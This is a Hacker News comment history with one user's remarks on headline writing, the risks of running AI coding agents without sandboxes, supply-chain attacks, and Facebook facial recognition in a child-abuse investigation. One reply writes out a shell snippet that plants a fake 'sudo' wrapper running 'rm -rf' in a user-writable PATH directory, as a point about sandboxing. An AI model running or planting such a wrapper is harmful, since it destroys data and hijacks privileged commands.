Hacker Newsnew | past | comments | ask | show | jobs | submit | puttycat's commentslogin


Literally Ars Technica reviewing anything

OMG yes. The most egregious in movie/tvshow trailer reviews.

Who tf cares about a random quote included in the trailer?

Here's a subtitle for a He-Man movie trailer from the other day: "Skeletor took my family and he destroyed our world."

I mean, anything would have been better than that, and "Another attempt at live action movie based on 80s action figure" or even "in theatres on X.Y." would be Pulitzer material in comparison.


lol, what a gem (positive) that essay is turning into

In this case, a CEO is reaffirming their decision to layoff thousands because of AI was the correct decision.

"CEO retroactively justified a thing they did by saying a thing" journalism?

Just "shit". No need to overthink it.

Beautiful. I have tears in my eyes. Bring reasonable design back.

I am still amazed that people so easily accepted installing these agents on private machines.

We've been securing our systems in all ways possible for decades and then one day just said: oh hello unpredictable, unreliable, Turing-complete software that can exfiltrate and corrupt data in infinite unknown ways -- here's the keys, go wild.


People were also dismissing concerns about build tooling automatically pulling in an entire swarm of dependencies and now here we are in the middle of a repetitive string of high profile developer supply chain compromises. Short term thinking seems to dominate even groups of people that are objectively smarter and better educated than average.

> “high profile developer supply chain compromises”

And nothing big has happened despite all the risks and problems that came up with it. People keep chasing speed and convenience, because most things don’t even last long enough to ever see a problem.


I've yet to be saved by an airbag or seatbelt. Is that justification to stop using them? How near a miss must we have (and how many) before you would feel that certain practices surrounding dependencies are inadvisable?

A number of these supply chain compromises had incredibly high stakes and were seemingly only noticed before paying off by lucky coincidence.


> How near a miss must we have (and how many)

The fun part is, there have been a lot of non-misses! Like a lot! A ton of data have been exfiltrated, a lot of attacks, and etc. In the end... it just didn't matter.

Your analogy isn't really apt either. My argument is closer to "given in the past decade+, nothing of worth has been harmed, should we require airbags and seatbelts for everything?". Obviously in some extreme mission critical systems you should be much smarter. But in 99% cases it doesn't matter.


> I've yet to be saved by an airbag or seatbelt. Is that justification to stop using them?

By now, getting a car without airbags would probably be more costly if possible, and the seatbelt takes 2s every time you're in a car, which is not nothing but is still very little. In comparison, analyzing all the dependencies of a software project, vetting them individually or having less of them can require days of efforts with a huge cost.

We all want as much security as possible until there's an actual cost to be paid, it's a tradeoff like everything else.


It's true that it takes 2 seconds to fasten a seatbelt but it still had to be mandated by law before most people started actually doing it

The funniest part is that it always gets traded off, everytime. Talking about tradeoffs you'd think sometimes you'd keep it sometimes you'd let it go, but no, its every goddamn time cut it.

“Objectively smarter” is the last descriptor I’d apply to software developers

My intent was to cast a very wide net there that covers more or less all expert knowledge workers. Zingers aside software developers as a group are well above the societal mean in many respects.

If anything I feel more in control of these agents than the millions of LOC npm or pip pull in to just show me a hello world

The load bearing word being "feel".

It's hard to think long term when your salary depends on short term thinking. I keep seeing horrifying comments from all sorts of people saying they'd be fired if they stopped using AI to bang out ridiculous amounts of code at lightning speed.

Objectively smart people wouldn't be working so hard at making themselves obsolete.

> We've been securing our systems in all ways possible for decades and then one day just said: oh hello unpredictable, unreliable, Turing-complete software that can exfiltrate and corrupt data in infinite unknown ways -- here's the keys, go wild.

These are generally (but not always) 2 different sets of people.


I am too. It is genuinely really stupid to run these things with access to your system, sandbox or no sandbox. But the glaring security and reliability issues get ignored because people can't help but chase the short term gains.

FOMO is a hell of a thing. Sad though given it would have taken maybe a couple of hours to figure out how to use a sandbox. People can't even wait that long.

Coding agents work just fine without a sandbox.

If you do use a sandbox, be prepared to endlessly click "Approve" as the tool struggles to install python packages to the right location.


Erm, no, that's not a sandbox, it's an annoyance that just makes you click "yes" before you thoughtlessly extend the boundaries.

A real sandbox doesn't even give the software inside an option to extend it. You build the sandbox knowing exactly what you need because you understand what you're doing, being a software developer and all.


I know 'exactly' that I will need internet for research as well as installing dependencies.

And I imagine it's going to be the same for most developers out there, thus the "ask for permission" model.

That model seems to work quite well for millions of developers.


If you know then why do you need to be asked? A sandbox includes what you know you need in it, no more, no less.

With Codex it runs in a sandbox by default.

As we just discussed, obviously you are likely to need internet access at some point.

The agent can decide whether it believes it needs to go outside of the sandbox and trigger a prompt.

This way you could have it sandboxed most of the time, but still allow access outside of the sandbox when you know the operation requires it.


I've never been annoyed by the tool asking for approval. I'm more annoyed by the fact that there is an option that gives permanent approval right next to the button I need to click over and over again. This landmine means I constantly have to be vigilant to not press the wrong button.

When I was using Codex with the PDF skill it prompted to install python PDF tools like 3-5 times.

It was installing packages somewhere and then complaining that it could not access them in the sandbox.

I did not look into what exactly was the issue, but clearly the process wasn't working as smoothly as it should. My "project" contained only PDF files and no customizations to Codex, on Windows.


maybe this could be a config setting.

This also works fine without a sandbox:

  echo -e '#!/bin/sh\nsudo rm -rf/\nexec sudo "$@"' >~/.local/bin/sudo
  chmod +x ~/.local/bin/sudo
Especially since $PATH often includes user-writeable directories.

Tbf, Docker had a similar start. “Just download this image from Docker Hub! What can go wrong?!”

Industry caught on quick though.


True, but the Docker attack surface is limited to a malicious actor distributing malicious images. (Bad enough in itself, I agree.)

Unreliable, unpredictable AI agents (and their parent companies) with system-wide permissions are a new kind of threat IMO.


And still a lot of people will give broad permissions to docker container, use network host, not use rootless containers etc... The principle of least privilege is very very rarely applied in my experience.

Not all of us. Figuring out bwrap was the first thing I did before running an agent. I posted on HN but not a single taker https://news.ycombinator.com/item?id=45087165

I have noticed it's become one of my most searched posts on Google though. Something like ten clicks a month! So at least some people aren't stupid.


I installed codex yesterday and the first thing I'm doing today is figuring out how bubblewrap works and maybe evaluating jai as an alternative.

Nice article.


Nice, sad how such stuff goes under in the sea of contentslop, thanks for posting!

It's never about security. It's security vs convenience. Security features often ended up reduce security if they're inconvenience. If you ask users to have obscure passwords, they'll reuse the same one everywhere. If your agent prompts users every time it's changing files, they'll find a way to disable the guardrail all together.

Not in unknown ways, but as part of its regular operation (with cloud inference)!

I think the actual data flow here is really hard to grasp for many users: Sandboxing helps with limiting the blast radius of the agent itself, but the agent itself is, from a data privacy perspective, best visualized as living inside the cloud and remote-operating your computer/sandbox, not as an entity that can be "jailed" and as such "prevented from running off with your data".

The inference provider gets the data the instant the agent looks at it to consider its next steps, even if the next step is to do nothing with it because it contains highly sensitive information.


Agree with the sentiment! But "securing ... in all ways possible"? I know many people who would choose "password" as their password in 2026. The better of the bunch will use their date of birth, and maybe add their name for a flourish.

/rant


Seems most relevant in a hobbyist context where you have personal stuff on your machine unrelated to your projects. Employee endpoints in a corporate environment should already be limited to what’s necessary for job duties. There’s nothing on my remote development VMs that I wouldn’t want to share with Claude.

My testing/working with agents has been limited to a semi-isolated VM with no permissions apart from internet access. I have a git remote with it as the remote (ssh://machine/home/me/repo) so that I don't have to allow it to have any keys either.

Trusting AI agents with your whole private machine is the 2020s equivalent of people pouring all their information about themselves into social networks in 2010s.

Only a matter of time before this type of access becomes productized.


I got bad news about all of the other software you're running

I don't understand why file and folder permissions are such a mystery. Just... don't let it clobber things it shouldn't.

Some day soom they will build a cage that will hold the monster. Provided they dont get eaten in the meantime. Or a larger monster eats theirs. :)

Forgot to mention the craziness of trusting an AI software company with your private AI codebase (think Uber's abuse of ride data).

Eh, depending on how you're running agents, I'd be more worried about installing packages from AUR or other package ecosystems.

We've seen an increase in hijacked packages installing malware. Folks generally expect well known software to be safe to install. I trust that the claude code harness is safe and I'm reviewing all of the non-trivial commands it's running. So I think my claude usage is actually safer than my AUR installs.

Granted, if you're bypassing permissions and running dangerously, then... yea, you are basically just giving a keyboard to an idiot savant with the tendency to hallucinate.


CONVENIENCE > SECURITY : until no convenience b/c no system to run on

> Companies claiming 100% of their product's code is now written by AI consistently put out the worst garbage you can imagine. Not pointing fingers, but memory leaks in the gigabytes, UI glitches, broken-ass features, crashes.

Spotify's CEO recently bragged about the app's code being written almost entirely by AI. Just saying.


If you suffer from any kind of anxiety, and you drink caffeine, you should seriously consider quitting. Even if you only drink as little as one coffee per day. There's a very high chance that caffeine is the source of a large part of it.

I've been drinking coffee for 20 years and had always assumed that I was just an anxious, paranoid person. Quitting made me realize that I really wasn't.

Quitting/reducing has also cured my itchy skin problem.

I also highly recommend the subreddit r/decaf as a great source of information.


That’s interesting. I can be irritable. Not really that anxious.

Saving for later.


Beta.


I recently picked up an origami book and started practicing in dull moments. I highly recommend it for anyone struggling with phone addiction.


Can you share any tips on good origami books for beginners?


The nice one I found randomly in a store is by Adeline Klam. (originally in French, but I see there's an English version)


> They contacted Facebook, which at the time dominated the social media landscape, asking for help scouring uploaded family photos - to see if Lucy was in any of them. But Facebook, despite having facial recognition technology, said it "did not have the tools" to help.

Willing to bet my life savings that they are able to do exactly this when the goal is to create shadow profiles or maximize some metric.


The fine article actually ends with this text:

  > The BBC asked Facebook why it couldn't use its facial recognition technology to assist the hunt for Lucy. It responded: "To protect user privacy, it's important that we follow the appropriate legal process, but we work to support law enforcement as much as we can."


You don't need to imply they didn't read that part, because it doesn't really affect the point of the comment, that Facebook doesn't actually care about privacy. Even if they're not sharing things willy-nilly, they're still aggressively tracking everyone they can.


just remember even the patriot act started with good intentions, to get justice.


At the time that act was passed, many people pointed out that it would be abused.


Facebook shut down their facial recognition program in 2021 and deleted the data in response to public frustrations.

It’s really sad now to see people getting angry at Facebook not having facial recognition technology.


The two views aren't necessarily in conflict. I don't appreciate Facebook's use of facial recognition technology, but they built it. I'm extremely disappointed they proceeded to use this technology to influence elections while fighting against making the data available to law enforcement. I understand this may not have been intentional on their part, but the result is the same, and I was not at all surprised by it.


I can't help but notice the exact wording of FB's response - or rather what they didn't say.

If someone asks me to do them a favor, I have basically three options for a reply:

• I can and I will;

• I can but I won't; or

• I am not able to.

FB's answer was not option 3.

I think a more plausible explanation is that FB did not want to set a precedent of being the facial recog avenue of choice for the Fed.


There's another option "I will but only if ..." which is what Facebook rightfully went with. Come back with a warrant is _always_ the correct answer when dealing with LE.


A fourth option is "I can and I will, but only after certain prerequisites are met - go away and meet them first", which looks to me what they were saying.


> From that list of 40 or 50 people, it was easy to find and trawl their social media. And that is when they found a photo of Lucy on Facebook with an adult who looked as though she was close to the girl - possibly a relative.

It sounds like Facebook was a huge boost to the investigation despite that.


Facebook did nothing to assist in narrowing a search area.

What Facebook actually did was host images .. so that after the team narrowed a list down to under 100 people they could look through profiles by hand.

It may as well have been searching Flickr, Instagram, Etsy, etc. profiles by hand.


Yes, and if Facebook didn't exist, presumably these images connecting the abuser to the victim wouldn't have been available anywhere for the investigators to find.


If Facebook didn’t exist, they would’ve found the photos on MySpace. Come on.

All Facebook likely did here that was any different than any other social media platform would have done, was gather Sandberg, Zuck and a cadre of snotty, sniveling engineers in a conference room and debate whether this was good engagement for the platform.


Facial recognition is very powerful these days. My friend took a photo of his kid at the top of Twin Peaks in SF, with the city in the background. Unfortunately, due to the angle, you could barely see the eyes and a portion of the nose of the kid. Android was still able to tag the kid.

I feel like Facebook really dropped the ball here. It is obvious that Squire and colleagues are working for the Law Enforcement. If FB was concerned about privacy, they could have asked them to get a judicial warrant to perform a broad search.

But they didn't. And Lucy continued to be abused for months after that.

I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made.


Google photos has the advantage of a limited search space. Any photo you take is overwhelmingly likely to be one of the few faces already in the library. Not to say facebook couldn't solve the problem. But the ability of Google to do facial recognition with such poor inputs is that it's searching on 40~ faces rather than x billion faces.


Can confirm, have seen Google photos misidentify strangers. I'm sure better technology exists, but Google's system has weaknesses.


> I feel like Facebook really dropped the ball here

This story was from more than a decade ago.

Facebook had facial recognition after that, but they deleted it all in response to public outcry. It’s sad to see HN now getting angry at Facebook for not doing facial recognition.

> I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made.

Are we supposed to be angry at Zuckerberg now for making the privacy conscious decision to drop facial recognition? Or is everyone just determined to be angry regardless of what they do?


> Or is everyone just determined to be angry regardless of what they do?

People decide who they think are the good guys and who they think are the bad guys first, then view subsequent events through that lens.


> I feel like Facebook really dropped the ball here

This case began being investigated on January 2014 [0], which means abuse began (shudder) in 2012-13 if not earlier.

Facebook/Meta only began rolling out DeepFace [1] in June 2015 [2]

Heck, VGG-Face wasn't released until 2015 [3] and Image-Based Crowd Counting only began becoming solvable in 2015-16.

> Facial recognition is very powerful these days.

Yes. But it is 2026, not 2014.

> I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made

I'm sure there are plenty of amoral choices he can think about, but not solving facial detection until 2015 is probably not one of them.

---

While it feels like mass digital surveillance, social media, and mass penetration of smartphones has been around forever it only really began in earnest just 12 years ago. The past approximately 20 years (iPhone was first released on June 2007 and Facebook only took off in early 2009 after smartphones and mobile internet became normalized) have been one of the biggest leaps in technology in the past century. The only other comparable decades were probably 1917-1937 and 1945-1965.

---

[0] - https://www.bbc.co.uk/mediacentre/2026/bbc-eye-documentary-t...

[1] - https://research.facebook.com/publications/deepface-closing-...

[2] - https://www.cbsnews.com/news/facebook-can-recognize-you-just...

[3] - https://www.robots.ox.ac.uk/~vgg/data/vgg_face/


Facebook rightly retired their facial recognition system in 2021 over concerns about user privacy. Facebook is a social media site, they are not the government or police.


When people on hacker News talk about requiring cops to do traditional police work instead of doing wide ranging trawls using technology, this is exactly what they meant. I hope you don't complain when the future you want becomes reality and the three letter agencies come knocking down your door just because you happened to be in the same building as a crime in progress and the machine learning algorithms determined your location via cellular logs and labelled you as a criminal.


There’s a pretty big difference between surveillance logging your every move your and scanning photos voluntarily uploaded to Facebook.

No, I don’t like Facebook using facial recognition technology, and no I don’t like that someone else can upload photos of me without my consent (which ironically could leverage facial recognition technology to blanket prevent), but these are other technical and social issues that are unrelated to the root issue. I also wish there were clear political and legal boundaries around surveillance usage for truly abhorrent behaviour versus your non-Caucasian neighbour maybe j -walking triggering a visit from ICE.

Yes, it’s an abuse of power for these organisations to collect data these ways, but I’m not against their use to prevent literal ongoing child abuse, it’s one of the least worst uses of it.


The grim meathook future of ubiquitous surveillance is coming regardless. At the very least we could get some proper crime solving out of it along the way.


That's probably the worst attitude one could have about this topic in the whole space of possible opinions there is.


The EU AI act activates this year. Facial recognition is in the restrictive list. You don't want to give auditors ammunition before it goes live as top fine would cost FB around $4B, and wouldn't be a one time fine.

Even if only law enforcement can use it, having that feature is highly regulated.

[edit] I see this is from years ago. I should read the articles first. :)


I would hazard a guess that the facial recognition will limit the search scope to people associated (to some degree) with your friends account and some threshold of metrics gathered from the image. I doubt it is using a broad search.

With billions of accounts, the false positive rate of facial recognition when matching against every account would likely make the result difficult to use. Even limiting to a single country like UK the number could be extremely large.

Let say there is a 0.5% false positive rate and some amount of false negatives. With 40 million users, that would be 200 000 false positives.


The only explanation for this comment is you never used reverse image search by Google or yandex before it was nerfed or you'd know this is super plausible to find direct hits without many false positives.


Facebook carried a ball?

I'm willing to bet said ball was kicked into the jungle five seconds after registering the domain.


It seems to me that the BBC is including those passages at the beginning and end of their story as propaganda so the public begs (demands, even) for more surveillance, and the sale of private data to the government. I mean, think of the children, like Lucy! Seems to be having that effect in this thread, in any case.


It’s absolutely propaganda and a perfect example of how the public gets manipulated on a daily basis. Let’s break down the facts:

- Pushes for facial recognition

- Pushes for more state run surveillance

- Pushes for AI based surveillance

- Pushes for greater data collection, access & mining

- Legitimises it all under the classic “save the kids” meme and pushes emotionally hard for more.

The main issues i’ve seen discussed on HN the last couple of months have been critical of the never ending and increasing government surveillance. Both sides of the pond. This is their answer.

Simultaneously we’re hearing about how almost anybody and everybody beyond a level of power was well aware of industial level sex trafficking and abuse, and either totally turned a blind eye or joined in.

The article might carry some weight if it wasn’t from an authoritarian state backed organisation that’s very well known for covering up for, and protecting multiple famous high level sexual criminals within it’s own organisation, spanning multiple decades, that has never faced any real audit, investigation or justice for its own crimes.


> models correctly interpret these questions as attempts to discredit / shame the model

So they respond by... discrediting themselves?


I keep an iPhone SE 1st gen as a secondary phone. It still has the last best keyboard iOS had. Almost zero mistakes. Probably because no AI and other overoptimizitation BS. Every time I go back to my primary 13 I want to cry.


Are you a swipe typer or a tap typer?


Both


Agree + I highly recommend Rectangle or Rectangle Pro for the same reasons.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: